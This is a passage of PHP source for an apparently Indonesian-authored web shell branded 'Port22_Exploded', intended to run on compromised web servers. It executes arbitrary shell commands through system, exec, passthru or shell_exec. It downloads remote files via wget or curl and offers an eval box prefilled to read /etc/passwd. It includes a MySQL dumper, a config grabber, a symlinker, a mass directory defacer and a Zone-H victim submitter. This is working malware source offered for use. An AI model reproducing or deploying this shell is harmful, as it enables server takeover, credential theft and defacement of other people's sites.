499.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
500.         <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
501.         <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
502.         </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
503.         <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
504.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
505. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
506. <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
507. <input class=\"inputzbut\" type=\"submit\" name=\"Chmod\" value=\"Chmod\" />
508. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
509.         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
510.         <td><a href=\"?y=$pwd&amp;edit=$full\">Edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">Rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">Delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">Download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">Gz</a>)</td></tr>";
511.     }
512.     $buff .= "</table>";
513.     return $buff;
514. }
515.  
516. function ukuran($file){
517.     if($size = @filesize($file)){
518.         if($size <= 1024) return $size;
519.         else{
520.             if($size <= 1024*1024) {
521.                 $size = @round($size / 1024,2);;
522.                 return "$size kb";
523.             }
524.             else {
525.                 $size = @round($size / 1024 / 1024,2);
526.                 return "$size mb"; 
527.             }
528.         }
529.     }
530.     else return "???";
531. }
532.  
533. function exe($cmd){
534.     if(function_exists('system')) {
535.         @ob_start();
536.         @system($cmd);
537.         $buff = @ob_get_contents();
538.         @ob_end_clean();
539.         return $buff;
540.     }
541.     elseif(function_exists('exec')) {
542.         @exec($cmd,$results);
543.         $buff = "";
544.         foreach($results as $result){
545.             $buff .= $result;
546.         }
547.         return $buff;
548.     }
549.     elseif(function_exists('passthru')) {
550.         @ob_start();
551.         @passthru($cmd);
552.         $buff = @ob_get_contents();
553.         @ob_end_clean();
554.         return $buff;
555.     }
556.     elseif(function_exists('shell_exec')){
557.         $buff = @shell_exec($cmd);
558.         return $buff;
559.     }
560. }
561.  
562. function tulis($file,$text){
563.     $textz = gzinflate(base64_decode($text));
564.      if($filez = @fopen($file,"w"))
565.      {
566.          @fputs($filez,$textz);
567.          @fclose($file);
568.      }
569. }
570.  
571. function ambil($link,$file) {
572.    if($fp = @fopen($link,"r")){
573.        while(!feof($fp)) {
574.             $cont.= @fread($fp,1024);
575.         }
576.         @fclose($fp);
577.        $fp2 = @fopen($file,"w");
578.        @fwrite($fp2,$cont);
579.        @fclose($fp2);
580.    }
581. }
582.  
583. function which($pr){
584.     $path = exe("which $pr");
585.     if(!empty($path)) { return trim($path); } else { return trim($pr); }
586. }
587.  
588. function download($cmd,$url){
589.     $namafile = basename($url);
590.     switch($cmd) {
591.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
592.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
593.         case 'wfread' : ambil($wurl,$namafile);break;
594.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
595.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
596.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
597.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
598.         default: break;
599.     }
600.     return $namafile;
601. }
602.  
603. function get_perms($file)
604. {
605.     if($mode=@fileperms($file)){
606.         $perms='';
607.         $perms .= ($mode & 00400) ? 'r' : '-';
608.         $perms .= ($mode & 00200) ? 'w' : '-';
609.         $perms .= ($mode & 00100) ? 'x' : '-';
610.         $perms .= ($mode & 00040) ? 'r' : '-';
611.         $perms .= ($mode & 00020) ? 'w' : '-';
612.         $perms .= ($mode & 00010) ? 'x' : '-';
613.         $perms .= ($mode & 00004) ? 'r' : '-';
614.         $perms .= ($mode & 00002) ? 'w' : '-';
615.         $perms .= ($mode & 00001) ? 'x' : '-';
616.         return $perms;
617.     }
618.     else return "??????????";
619. }
620.  
621. function clearspace($text){
622.     return str_replace(" ","_",$text);
623. }
624.  
625.  
626. ?>
627. <html><head><link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg"><title><?=$title ?> <?=$versi ?></title>
628. <script type="text/javascript">
629. function tukar(lama,baru){
630.     document.getElementById(lama).style.display = 'none';
631.     document.getElementById(baru).style.display = 'block';
632. }
633. </script><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
634. <style type="text/css">
635. body { background-color:transparan;background:#000;background-image: url("<?=$background; ?>");background-position: center;    background-attachment: fixed;background-repeat: no-repeat; }
636. a {text-decoration:none;
637. }
638. a:hover{
639. border-bottom:1px solid #00ff00;
640. }
641. *{
642.     font-size:11px;
643.     font-family:Tahoma,Verdana,Arial;
644.     color:<?=$color; ?>;
645. }
646. #menu{
647.     background-color:transparan;
648.     margin:8px 2px 4px 2px;
649. }
650.  
651. #menu a{
652.     padding:4px 18px;
653.     margin:0;
654.     background:#222222;
655.     text-decoration:none;
656.     letter-spacing:2px;
657.     -moz-border-radius: 5px; -moz-box-shadow-webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
658. }
659. #menu a:hover{
660.     background:#191919;
661.     border-bottom:1px solid #333333;
662.     border-top:1px solid #333333;
663. }
664.  
665. .tabnet{
666.     margin:15px auto 0 auto;
667.     border: 1px solid #333333;
668.     color: #FFCC00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;}
669. .msupiani{ font-family:Vivaldi;font-size:50px;color: #00FF00;}
670. .tabnet{
671.     margin:15px auto 0 auto;
672.     border: 1px solid #333333; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
673. }
674. .main {
675.     width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
676. }
677. .gaya {
678.     color: $color;
679. }
680. .inputz{
681.     background:#111111;
682.     border:0;
683.     padding:2px;
684.     border-bottom:1px solid #222222;
685.     border-top:1px solid #222222; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
686. }
687. .inputzbut{
688.     background:#111111;
689.     color:<?=$color; ?>;
690.     margin:0 4px;
691.     border:1px solid #444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
692.  
693. }
694. .inputz:hover, .inputzbut:hover{
695.     border-bottom:1px solid #00ff00;
696.     border-top:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
697. }
698. .output {
699.     margin:auto;
700.     border:1px solid <?=$color; ?>;
701.     width:100%;
702.     height:400px;
703.     background:#000000;
704.     padding:0 2px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
705. }
706. .cmdbox{
707.     width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
708. }
709. .head_info{
710.     padding: 0 4px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
711. }
712. .exploded{
713.     font-size:30px;
714.     padding:0;
715.     color:#444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
716. }
717. .exploded_tbl{
718.     text-align:center;
719.     margin:0 4px 0 0;
720.     padding:0 4px 0 0;
721.     border-right:1px solid #333333;
722. }
723. .phpinfo table{
724.     width:100%;
725.     padding:0 0 0 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
726. }
727. .phpinfo td{
728.     background:#111111;
729.     color:#cccccc;
730. padding:6px 8px;; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
731. }
732. .phpinfo th, th{
733.     background:#191919;
734.     border-bottom:1px solid #333333;
735. font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
736. }
737. .phpinfo h2, .phpinfo h2 a{
738.     text-align:center;
739.     font-size:16px;
740.     padding:0;
741.     margin:30px 0 0 0;
742.     background:#222222;
743.     padding:4px 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
744. }
745. .explore{
746. width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
747. }
748. .explore a {
749. text-decoration:none;
750. }
751. .explore td{
752. border-bottom:1px solid #333333;
753. padding:0 8px;
754. line-height:24px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
755. }
756. .explore th{
757. padding:3px 8px;
758. font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
759. }
760. .explore th:hover , .phpinfo th:hover{
761. border-bottom:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
762. }
763. .explore tr:hover{
764. background:#111111; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
765. }
766. .viewfile{
767. background:#EDECEB;
768. color:#000000;
769. margin:4px 2px;
770. padding:8px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
771. }
772. .sembunyi{
773. display:none;
774. padding:0;margin:0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
775. }
776. .jaya{ margin:5px; text-align:right; <?=$color; ?>;}
777. .footer{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ; }
778. .footer a{ font-size:14px; }
779. .footer span{ font-size:14px;}
780. </style></head>
781.  
782. <body onLoad="document.getElementById('cmd').focus();">
783. <!-- logout start here -->
784. <div id="menu"><span style='float:right;'><br>
785. <?="Time On Server : <b> ".date("d M Y H:i:s",time())."</b>"; ?> <br><br> &nbsp &nbsp  &nbsp &nbsp
786. <a href="?<?="y=".$pwd; ?>&amp;x=kill" title='Remove Shell'>Remove</a>
787.  |
788. <a href="?<?="y=".$pwd; ?>&amp;x=logout" title='Logout'>Logout</a> &nbsp &nbsp &nbsp <br><br>
789. &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp <a href="?<?="y=".$pwd; ?>&amp;x=about"  title='About Author'>About</a>
790. </span></div>
791. <!-- logout end here -->
792. <div class="main">
793. <!-- head info start here -->
794. <div class="head_info">
795. <table><tr>
796. <td><table class="inputz"><tr><td><a href="" target="blank" onClick="location.reload();"><span class="F0ku5"><img src='<?=$logo; ?>' title="Security Exploded" width="150" height="150"></span></span></a></td></tr><tr><td>
797. <a href="http://twitter.com/Port22_Exploded" class="twitter-follow-button" data-show-count="false">    Follow @Port22_Exploded</a>
798. <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'http';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script></td></tr></table></td>
799. <td><?=$buff; ?></td>
800. </tr></table></div>
801. <!-- head info end here -->
802. <!-- menu start --><br>
803. <center><div id="menu">
804. <a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34" title='Home '></a>
805. <a href="?<?="y=".$pwd; ?>" title='File Explorer'>Files</a>
806. <a href="?<?="y=".$pwd; ?>&amp;x=upload" title='Upload File'>Uploader</a>
807. <a href="?<?="y=".$pwd; ?>&amp;x=sql" title='Connect To Database'>MySQL Manager</a><br><br>
808. <a href="?<?="y=".$pwd; ?>&amp;x=jumping" title='Jumping'>Jumper</a>
809. <a href="?<?="y=".$pwd; ?>&amp;x=symlink" title='Symlink'>Multi Symlinker</a>
810. <a href="?<?="y=".$pwd; ?>&amp;x=grabc" title='Config Grabber'>Config Grabber</a><br><br>
811. <a href="?<?="y=".$pwd; ?>&amp;x=mass" title='Deface To All Folder'>Mass Directory Defacer</a>
812. <a href="?<?="y=".$pwd; ?>&amp;x=zone" title='Submit Victim To Zone-H'>Zone-H Submiter</a>
813. </div></center><br>
814. <!-- menu end -->
815. <?php
816. @ini_set('display_errors', 0);
817. @ini_set('output_buffering',0);
818.  
819. if(isset($_GET['x']) && ($_GET['x'] == 'kill')) {
820.    
821.     echo "
822. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
823.  
824.     <tr>
825.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
826.     <center><b><font size=5 style=italic color=#00ff00>Shell Killer</font></b></center></td></tr></table>
827. ";
828.  
829. echo '<center><br><font style="color:<?=$color; ?>">Do You Really Want To Delete This Shell ?</b></center><br>';
830. ?>
831. <center>
832. <div id="menu">
833. <a  href="?<?="y=".$pwd;?>&amp;x=killit" title='Remove Shell' >Yes, I Want</font></a> &nbsp;&nbsp;&nbsp;&nbsp;
834. <a  href="<?=$_SERVER['PHP_SELF']; ?>">Cancel</a></b></center><br><br>
835. </div>
836. <?php
837. }
838. if(isset($_GET['x']) && ($_GET['x'] == 'killit')) {
839. $file = $_SERVER['PHP_SELF'];
840. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
841. die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Shell Has Been Killed... Take Care And Stay Safe</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
842. else
843. echo '<font color="#fff600" size="2pt">Unlink Error !</font>';
844.  
845. }
846. /////////////////////////////
847. elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
848. {
849. @ini_set('output_buffering',0);
850. echo "
851. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
852.  
853.     <tr>
854.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
855.     <center><b><font size=5 style=italic color=#00ff00>Eval</font></b></center></td></tr></table>
856. ";
857.  ?>
858.  
859. <form action="?y=<?=$pwd; ?>&amp;x=php" method="post">
860. <table class="tabnet" style="width:800px;height:300px">
861. <tr><td>
862. <textarea class="output" name="cmd" id="cmd">
863. <?php
864. if(isset($_POST['submitcmd'])) {
865.     echo eval(magicboom($_POST['cmd']));
866. }
867. else echo "echo file_get_contents('/etc/passwd');";
868. ?>
869. </textarea>
870. <tr><td><input style="width:800px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
871. </table>
872. </form>
873.  
874. <?php }
875.  
876. /////////////////////////////
877. ///////////////////////////////////////////////////////////////////////////////
878. elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
879.     echo "
880. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
881.  
882.     <tr>
883.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
884.     <center><b><font size=5 style=italic color=#00ff00>MySQL Manager</font></b></center></td></tr></table>
885. ";
886. function view_size($size) {
887.   if (!is_numeric($size)) { return FALSE; }
888.   else {
889. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
890. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
891. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
892. else {$size = $size . " B";}
893. return $size;
894.   }
895. }
896. function mysql_dump($set) {
897.   $sock = $set["sock"];
898.   $db = $set["db"];
899.   $print = $set["print"];
900.   $nl2br = $set["nl2br"];
901.   $file = $set["file"];
902.   $add_drop = $set["add_drop"];
903.   $tabs = $set["tabs"];
904.   $onlytabs = $set["onlytabs"];
905.   $ret = array();
906.   $ret["err"] = array();
907.   if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
908.   if (empty($db)) {$db = "db";}
909.   if (empty($print)) {$print = 0;}
910.   if (empty($nl2br)) {$nl2br = 0;}
911.   if (empty($add_drop)) {$add_drop = TRUE;}
912.   if (empty($file)) {
913. $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
914.   }
915.   if (!is_array($tabs)) {$tabs = array();}
916.   if (empty($add_drop)) {$add_drop = TRUE;}
917.   if (sizeof($tabs) == 0) {
918. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
919. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
920.   }
921.   $out = "
922.  # Dumped By ".$xName."
923.  # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
924.  # Date: ".date("d.m.Y H:i:s")."
925.  # DB: \"".$db."\"
926.  #---------------------------------------------------------";
927.   $c = count($onlytabs);
928.   foreach($tabs as $tab) {
929. if ((in_array($tab,$onlytabs)) or (!$c)) {
930.   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
931.   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
932.   if (!$res) {$ret["err"][] = mysql_smarterror();}
933.   else {
934. $row = mysql_fetch_row($res);
935. $out .= $row["1"].";\n\n";
936. $res = mysql_query("SELECT * FROM `$tab`", $sock);
937. if (mysql_num_rows($res) > 0) {
938.   while ($row = mysql_fetch_assoc($res)) {
939. $keys = implode("`, `", array_keys($row));
940. $values = array_values($row);
941. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
942. $values = implode("', '", $values);
943. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
944. $out .= $sql;
945.   }
946. }
947.   }
948. }
949.   }
950.   $out .= "#---------------------------------------------------------------------------------\n\n";
951.   if ($file) {
952. $fp = fopen($file, "w");
953. if (!$fp) {$ret["err"][] = 2;}
954. else {
955.   fwrite ($fp, $out);
956.   fclose ($fp);
957. }
958.   }
959.   if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
960.   return $out;
961. }
962. function mysql_buildwhere($array,$sep=" and",$functs=array()) {
963.   if (!is_array($array)) {$array = array();}
964.   $result = "";
965.   foreach($array as $k=>$v) {
966. $value = "";
967. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
968. $value .= "'".addslashes($v)."'";
969. if (!empty($functs[$k])) {$value .= ")";}
970. $result .= "`".$k."` = ".$value.$sep;
971.   }
972.   $result = substr($result,0,strlen($result)-strlen($sep));
973.   return $result;
974. }
975. function mysql_fetch_all($query,$sock) {
976.   if ($sock) {$result = mysql_query($query,$sock);}
977.   else {$result = mysql_query($query);}
978.   $array = array();
979.   while ($row = mysql_fetch_array($result)) {$array[] = $row;}
980.   mysql_free_result($result);
981.   return $array;
982. }
983. function mysql_smarterror($sock) {
984.   if ($sock) { $error = mysql_error($sock); }
985.   else { $error = mysql_error(); }
986.   $error = htmlspecialchars($error);
987.   return $error;
988. }
989. function mysql_query_form() {
990.   global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
991.   if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
992.   if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
993.   if ((!$submit) or ($sql_x)) {
994. echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
995. if ($tbl_struct) {
996.   echo "<td valign=\"top\"><b>Fields:</b><br>";
997.   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
998.   echo "</td></tr></table>";
999. }
1000.   }
1001.   if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1002. }
1003. function mysql_create_db($db,$sock="") {
1004.   $sql = "CREATE DATABASE `".addslashes($db)."`;";
1005.   if ($sock) {return mysql_query($sql,$sock);}
1006.   else {return mysql_query($sql);}
1007. }
1008. function mysql_query_parse($query) {
1009.   $query = trim($query);
1010.   $arr = explode (" ",$query);
1011.   $types = array(
1012. "SELECT"=>array(3,1),
1013. "SHOW"=>array(2,1),
1014. "DELETE"=>array(1),
1015. "DROP"=>array(1)
1016.   );
1017.   $result = array();
1018.   $op = strtoupper($arr[0]);
1019.   if (is_array($types[$op])) {
1020. $result["propertions"] = $types[$op];
1021. $result["query"]  = $query;
1022. if ($types[$op] == 2) {
1023.   foreach($arr as $k=>$v) {
1024. if (strtoupper($v) == "LIMIT") {
1025.   $result["limit"] = $arr[$k+1];
1026.   $result["limit"] = explode(",",$result["limit"]);
1027.   if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1028.   unset($arr[$k],$arr[$k+1]);
1029. }
1030.   }
1031. }
1032.   }
1033.   else { return FALSE; }
1034. }
1035. function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
1036. function html_style() {
1037. $style = ' <style type="text/css"> a { text-decoration:none; } a:hover { color: #00ff00; border-bottom:1px solid #00ff00; } input[type="text"], input[type="password"], select{ background:#111111; border:0; padding:2px; border:1px solid #444444; } input[type="submit"]{ background:#111111; color:#ffffff; margin:0 4px; border:1px solid #444444;} input[type="text"]:hover, input[type="submit"]:hover, input[type="password"]:hover, select:hover{ border-bottom:1px solid #00ff00;border-top:1px solid #00ff00;} .tab { width:100%; } th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .tub { width:100%; }  .tub th{ border-bottom:1px solid #00ff00; padding:3px;} .tub tr:hover{ background:#006400; } .tub td{ border-bottom:1px solid #333333; padding-left:3px; } #maininfo { padding:5px; margin-top:10px; margin-left:2px; margin-right:2px; background:#191919; } #maininfo a{ color:#00ff00; } textarea { background:#000000; border:1px solid #444444;} textarea:hover { border:1px solid #00ff00;} </style><center>';
1038. return $style;
1039. }
1040. $auto_surl = TRUE;
1041. foreach ($_REQUEST as $k => $v) {
1042.   if (!isset($$k)) { $$k = $v; }
1043. }
1044. if ($auto_surl) {
1045.   $include = "&";
1046.   foreach (explode("&",getenv("QUERY_STRING")) as $v) {
1047. $v= explode("=",$v);
1048. $name= urldecode($v[0]);
1049. $value= @urldecode($v[1]);
1050. $needles = array("http://","https://","ssl://","ftp://","\\\\");
1051. foreach ($needles as $needle) {
1052.   if (strpos($value,$needle) === 0) {
1053. $includestr .= urlencode($name)."=".urlencode($value)."&";
1054.   } } } }
1055. if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
1056. if (!isset($x)) { $x = "sql"; }
1057.   if ($x == "sql") {
1058.   foreach (array("sort","sql_sort") as $v) {
1059. if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
1060. if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
1061.   }
1062.   if ($sort_save) {
1063. if (!empty($sort)) { setcookie("sort",$sort); }
1064. if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
1065.   }
1066.   if (!isset($sort)) { $sort = $sort_default; }
1067.   $sort = htmlspecialchars($sort);
1068.   $sort[1] = strtolower($sort[1]);
1069.   echo html_style();
1070. echo "<div id='maininfo'>";
1071.   if ($x == "sql") {
1072.   $sql_surl = $surl."x=sql";
1073.   if (!isset($sql_login)) { $sql_login = ""; }
1074.   if (!isset($sql_passwd)) { $sql_passwd = ""; }
1075.   if (!isset($sql_server)) { $sql_server = ""; }
1076.   if (!isset($sql_port)) { $sql_port = ""; }
1077.   if (!isset($sql_tbl)) { $sql_tbl = ""; }
1078.   if (!isset($sql_x)) { $sql_x = ""; }
1079.   if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
1080.   if (!isset($sql_order)) { $sql_order = ""; }
1081.   if (!isset($sql_x)) { $sql_x = ""; }
1082.   if (!isset($sql_getfile)) { $sql_getfile = ""; }
1083.   if (@$sql_login)  { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
1084.   if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
1085.   if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
1086.   if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
1087.   if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
1088.   $sql_surl .= "&";
1089.   echo "";
1090.   if (@$sql_server) {
1091. $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1092. $err = mysql_smarterror($sql_sock);
1093. @mysql_select_db($sql_db,$sql_sock);
1094. if (@$sql_query and $submit) {
1095.   $sql_query_result = mysql_query($sql_query,$sql_sock);
1096.   $sql_query_error = mysql_smarterror($sql_sock);
1097. }
1098.   }
1099.   else { $sql_sock = FALSE; }
1100.   if (!$sql_sock) {
1101. if (!@$sql_server) { echo "<blink><b><font style= color:#ff0000>No Connection ! ! !</font></b></blink>"; }
1102. else { disp_error("ERROR: ".$err); }
1103.   }
1104.   else {
1105. #SQL Quicklaunch
1106. $sqlquicklaunch= array();
1107. $sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1108. $sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
1109. $sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
